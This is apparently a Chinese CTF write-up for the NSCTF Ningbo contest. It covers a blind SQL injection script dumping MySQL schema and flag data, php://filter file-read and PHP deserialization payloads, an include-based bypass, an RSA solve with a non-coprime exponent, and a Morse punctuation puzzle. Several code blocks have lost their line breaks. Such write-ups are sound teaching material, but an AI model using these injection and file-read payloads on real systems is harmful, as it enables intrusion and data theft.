NSCTF(第六届宁波市赛) 部分web+密码

WP by -Jay17（杭州师范大学3队）

WEB

Query

初始界面：

没有可以点的地方，也不能输入。扫一下看看。

/login.php路由可以登录，抓个包看看。

万能密码直接能登录进去了，回显只能知道是否登录成功。

盲注没什么过滤，直接给个脚本吧

#author:yu22x  improve by jay17
import requests
import string
import base64url="http://e2fe1a103f22256b.node.nsctf.cn/login.php"
s=string.ascii_letters+string.digits
flag=''
for i in range(1,999):print(i)for j in range(32,128):# 跑库名#s = f"999'/**/or/**/if(ascii(substr((SeleCt/**/grOUp_conCAt(schema_name)/**/fROm/**/information_schema.schemata),{i},1))/**/like/**/{j},1,0)#"# 跑表名#s = f"999'/**/or/**/if(ascii(substr((SeleCt/**/grOUp_conCAt(table_name)/**/fROm/**/information_schema.tables/**/wHERe/**/table_schema/**/like/**/'ctf'),{i},1))/**/like/**/{j},1,0)#"# 跑列名#s = f"999'/**/or/**/if(ascii(substr((Select/**/groUp_coNcat(column_name)frOm/**/information_schema.columns/**/Where/**/table_name/**/like/**/'f111'),{i},1))/**/like/**/{j},1,0)#"#######################s = f"999'/**/or/**/if(ord(substr((Select/**/grOUp_cOncat(flagdata)/**/frOm/**/ctf.f111),{i},1))/**/like/**/{j},1,0)#"#sre = s[::-1]   #逆序#sbase=str(base64.b64encode(sre.encode("utf-8")), "utf-8")   #base64data={'username':s,'password':'Password'}r=requests.post(url,data=data)#print(r.text)if "登录成功" in r.text:flag+=chr(j)print(flag)break#库  information_schema,ctf,什么什么的#ctf库： content,f111#f111表：   flagdata

Deserialization

查看源码

伪协议读取文件route.php

read=php://filter/read=convert.base64-encode/resource=route.php&input=1111     //POST

base解码得到route.php源码。

<h1>Here can you find the position of the flag!</h1><?php$position = "f14g.php";
$gadget = "h1nt.php";?>

源码有过滤，不能直接伪协议读取fl4g.php文件。

strpos()函数意思是查找字符串第一次出现的位置，不区分大小写，找不到就返回0（false）。

伪协议读取文件h1nt.php

read=php://filter/read=convert.base64-encode/resource=h1nt.php&input=1111    //POST

base解码得到h1nt.php源码。

<?php
class test
{public $position;public function __clone(){  echo file_get_contents($this->position); return $this->position;}
}  
?>  

本地构造反序列化poc：

<?php
class test{public $position="php://filter/read=convert.base64-encode/resource=f14g.php";public function __clone(){echo file_get_contents($this->position);return $this->position;}
}$a = new test();$j17 = $a;
echo serialize($a);
#echo urlencode(serialize($j17));
#$a = str_replace('O:4', 'O:+4',$a);

最后payload：（read=h1nt.php先包含这个文件，才能进行反序列化攻击，要不然初始界面代码里面没有test这个类）

read=h1nt.php&input=O:4:"test":1:{s:8:"position";s:57:"php://filter/read=convert.base64-encode/resource=f14g.php";}           //POST

base解码得到fl4g.php文件源码。获得flag。

<h1>NONONO</h1><?php$f14g = "flag{flag{2f28de2e0de34534a63b9c7ca570fba6}}";?>

CodeCheck

查看源码

思路：首先先绕过前面三个if，在最后一个if语句里面进行攻击。

原理：（做上一题的时候本地调试发现的）

payload：

http://70a07d94fd82492f.node.nsctf.cn/?a=data://text/plain,flag&b=data://text/plain,aaa&c=aaa&d=php://filter/read=convert.base64-encode/resource=index.php

base解码得到flag

<!-- 
$flag = "***********";
if(!isset($_GET['a']) or !isset($_GET['b']))
{die("NONONO");
}
if(file_get_contents($_GET['a'])!== "flag")
{die("NONONO");
}
if(file_get_contents($_GET['b'])!==$_GET['c'])
{die("NONONO");
}
if(isset($_GET['d']))
{include($_GET['d']);
}-->
<?php  
$flag = "flag{flag{eef8148799554cafa4be4dcabb266371}}";
if(!isset($_GET['a']) or !isset($_GET['b']))
{die("NONONO");
}
if(file_get_contents($_GET['a'])!== "flag")
{die("NONONO");
}
if(file_get_contents($_GET['b'])!==$_GET['c'])
{var_dump($_GET['c']);var_dump(file_get_contents($_GET['b']));die("yes");
}
if(isset($_GET['d']))
{include($_GET['d']);
}
?>

密码

secret

下载txt

p=134261118796789547851478407090640074022214132682000430136383795981942884853000826171189906102866323044078348933419038543719361923320694974970600426450755845839235949167391987970330836004768360774676424958554946699767582105556239177450470656065560178592346659948800891455240736405480828554486592172443394370831q=147847444534152128997546931602292266094740889347154192420554904651813340915744328104100065373294346723964356736436709934871741161328286944150242733445542228293036404657556168844723521815836689387184856871091025434896710605688594847400051686361372872763001355411405782508020591933546964183881743133374126947753n=19850163314401552502654477751795889962324360064924594948231168092741951675262933573691070993863763290962945190372400262526595224437463969238332927564085237271719298626877917792595603744433881409963046292095205686879015029586659384866719514948181682427744555313382838805740723664050846950001916332631397606277703888492927635867870538709596993987439225247816137975156657119509372023083507772730332482775258444611462771095896380644997011341265021719189098262072756342069189262188127428079017418048118345180074280858160934483114966968365184788420091050939327341754449300121493187658865378182447547202838325648863844192743c=13913396366755010607043477552577268277928241319101215381662331498046080625902831202486646020767568921881185124894960242867254162927605416228460108399087406989258037017639619195506711090012877454131383568832750606102901110782045529267940504471322847364808094790662696785470594892244716137203781890284216874035486302506042263453255580475380742959201314003788553692977914357996982118328587119124144181290753389394149235381045389696841471483947310663329993873046123134587149661347999774958105091103806375702387084149309542351541021140111048408248121408401601979108510758891595550054699719801708646232427198902271953673874e=28

看出来是RSA，e 、phi不互素

脚本如下：

import gmpy2
from gmpy2 import *
from Crypto.Util.number import *p=134261118796789547851478407090640074022214132682000430136383795981942884853000826171189906102866323044078348933419038543719361923320694974970600426450755845839235949167391987970330836004768360774676424958554946699767582105556239177450470656065560178592346659948800891455240736405480828554486592172443394370831
q=147847444534152128997546931602292266094740889347154192420554904651813340915744328104100065373294346723964356736436709934871741161328286944150242733445542228293036404657556168844723521815836689387184856871091025434896710605688594847400051686361372872763001355411405782508020591933546964183881743133374126947753
n=19850163314401552502654477751795889962324360064924594948231168092741951675262933573691070993863763290962945190372400262526595224437463969238332927564085237271719298626877917792595603744433881409963046292095205686879015029586659384866719514948181682427744555313382838805740723664050846950001916332631397606277703888492927635867870538709596993987439225247816137975156657119509372023083507772730332482775258444611462771095896380644997011341265021719189098262072756342069189262188127428079017418048118345180074280858160934483114966968365184788420091050939327341754449300121493187658865378182447547202838325648863844192743
c=13913396366755010607043477552577268277928241319101215381662331498046080625902831202486646020767568921881185124894960242867254162927605416228460108399087406989258037017639619195506711090012877454131383568832750606102901110782045529267940504471322847364808094790662696785470594892244716137203781890284216874035486302506042263453255580475380742959201314003788553692977914357996982118328587119124144181290753389394149235381045389696841471483947310663329993873046123134587149661347999774958105091103806375702387084149309542351541021140111048408248121408401601979108510758891595550054699719801708646232427198902271953673874
e=28phi=(p-1)*(q-1)
t = gmpy2.gcd(e,phi)
d=gmpy2.invert(e//t,phi)
mm=pow(c,d,n)m=gmpy2.iroot(mm,t)print(m)
print(long_to_bytes(13040004482825409793407610039229802952370109183661725078772340020905749006066989518246457469))

得到flag

Morse的笔记本

txt：

你知道吗。今天我竟然在街上捡到了100元钞票，我当时简直惊呆了，太幸运了。于是我赶紧把钞票捡起来！心里面十分高兴。走了一段路之后，我看见了一个老奶奶在街角卖菜！我就想。这100元钞票对我来说并不是很重要。但对她可能就很有用了。于是我走过去！把钞票递给了她。她非常感激。说我是个好心人。我也因此感到十分快乐！因为我知道。这个世界因为有我们每一个人的善良而变得更美好，今天天气真的很好，我和小丽！小明越好一起去公园玩，在公园里，我们看见了一只可爱的小松鼠，它在树枝上蹦来蹦去！十分活泼可爱。我们还看见了一些漂亮的花朵，它们在微风中轻轻摇曳。像在跳舞一样！我们一边走一边欣赏，一边笑一边玩。真是度过了一个美好的下午。回家的路上！我感到心情特别愉悦。因为我知道。只要心怀善意！天下没有做不成的事情。我经常会感叹人生的短暂。时间的流逝。但我从未停止过前进的步伐！人生路上，有时候你会遇到阻碍。但只要你努力地挑战，不放弃。就能突破困境！实现自己的梦想，所以，不管你遇到什么样的挑战，都不要气馁！坚持下去，你一定会收获成功的喜悦。因为！只有那些坚定自己方向的人，才能走得更远，更自信。当我们遭遇挫折和失败的时候！不要被打倒。要用心去学习，从失败中汲取经验教训。然后重新站起来！更加坚定地追求自己的目标。成功并不是一蹴而就的，需要我们付出长久的努力和坚持！但只要我们一直前进，终究会到达成功的彼岸！所以。让我们一起勇敢面对人生的挑战。迎接成功的喜悦。mesr{997a9k414dx8m4061u74v15m1y32201k}

只看标点符号，发现特别多感叹号，总体来看只有三种标点符号，特别像摩斯。

。，，。！。，！。。。！。。。！。，，！，，，！。，。！，。。！。。！。。。！，。，。！，，，！，。！，，。！。，。！。，！，！。。。

摩斯密码解密，得到：password is CONGRATS

因为有密码，所以想到吉妮维亚解密。解密mesr{997a9k414dx8m4061u74v15m1y32201k}

看样子是凯撒，工具一把梭了